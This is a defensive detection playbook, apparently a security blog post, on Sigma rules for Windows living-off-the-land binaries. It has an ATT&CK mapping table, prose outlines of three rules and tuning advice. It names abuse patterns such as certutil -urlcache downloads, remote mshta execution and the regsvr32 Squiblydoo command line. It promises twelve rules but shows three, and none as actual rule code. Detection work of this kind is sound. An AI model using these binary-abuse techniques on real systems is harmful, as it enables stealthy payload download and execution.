Detection Engineering Playbook: Sigma Rules for LOLBAS Living-Off-the-Land Persistence
67% of post-compromise persistence in H1 2026 used legitimate Windows binaries. Here are 12 production Sigma rules for the highest-volume LOLBAS techniques, with tuning notes and MITRE ATT&CK mappings.
Living-off-the-land binary (LOLBAS) abuse is the dominant persistence technique in modern intrusions. Attackers use legitimate Windows system binaries to download payloads, execute code, and move laterally — because these binaries are trusted, signed, and often excluded from security tool monitoring.
This playbook provides 12 production-ready Sigma rules for the most-abused LOLBAS binaries, with tuning guidance and MITRE ATT&CK mappings for each.
MITRE ATT&CK Technique Coverage
| Binary | ATT&CK Technique | Primary abuse | False positive risk |
|---|---|---|---|
| certutil.exe | T1140, T1105 | Encoded payload decode + download | Medium — legitimate PKI use |
| mshta.exe | T1218.005 | Remote HTA/VBScript execution | Low — rarely used legitimately |
| regsvr32.exe | T1218.010 | COM scriptlet (SCT) bypass execution | Medium — legitimate DLL registration |
| wmic.exe | T1047 | Remote WMI process creation | High — common in enterprise automation |
| rundll32.exe | T1218.011 | Shellcode injection via DLL export | High — very common legitimate use |
| bitsadmin.exe | T1197 | BITS job for payload download + persistence | Low — rarely used in modern OS |
| cmstp.exe | T1218.003 | INF file UAC bypass + code execution | Very low — almost no legitimate use |
| msiexec.exe | T1218.007 | Remote MSI payload execution | High — common software deployment |
| ieexec.exe | T1218 | Trusted binary remote payload download | Low — obsolete binary |
| odbcconf.exe | T1218.008 | REGSVR action to load DLL without regsvr32 | Very low — rare legitimate use |
| scrobj.dll | T1218.010 | Scriptlet registration via rundll32 | Low — uncommon legitimate use |
| InstallUtil.exe | T1218.004 | AppLocker bypass via .NET installer class | Low — uncommon in production |
Rule 1 — certutil Encoded Payload Download
certutil -decode and certutil -urlcache are the most commonly observed certutil abuse patterns. This rule fires on command lines containing decode or urlcache combined with a network path or Base64 indicators.
Rule 2 — mshta Remote HTA Execution
mshta.exe executing content from a remote URL or a network share is almost never legitimate in a corporate environment. The rule fires on any mshta process with a URL (http/https/ftp) or UNC path (\\) in the command line.
Rule 3 — regsvr32 COM Scriptlet Execution
regsvr32 /s /n /u /i:<url> scrobj.dll is the classic Squiblydoo bypass. The rule fires on any regsvr32 invocation with a remote URL, /i flag, or scrobj.dll in the command line.
Tuning Guidance
Deploy all 12 rules initially in alert-only (no block) mode. Collect 14 days of data and identify false-positive patterns in your environment. Common suppressions: wmic from known IT automation service accounts, msiexec from software deployment server IPs, rundll32 from known software installation paths. Never suppress by parent process alone — attackers routinely spoof parent process names.
- Start in detection-only mode — collect baselines before adding suppression
- Suppress by ComputerName or User for known automation, not by binary path
- Alert on newly-seen combinations (binary + parent process + user) rather than absolute detection
- Review and re-tune monthly — attacker tooling evolves to evade stale suppression rules
- Cross-correlate LOLBAS detections with network anomalies — isolated LOLBAS events have lower fidelity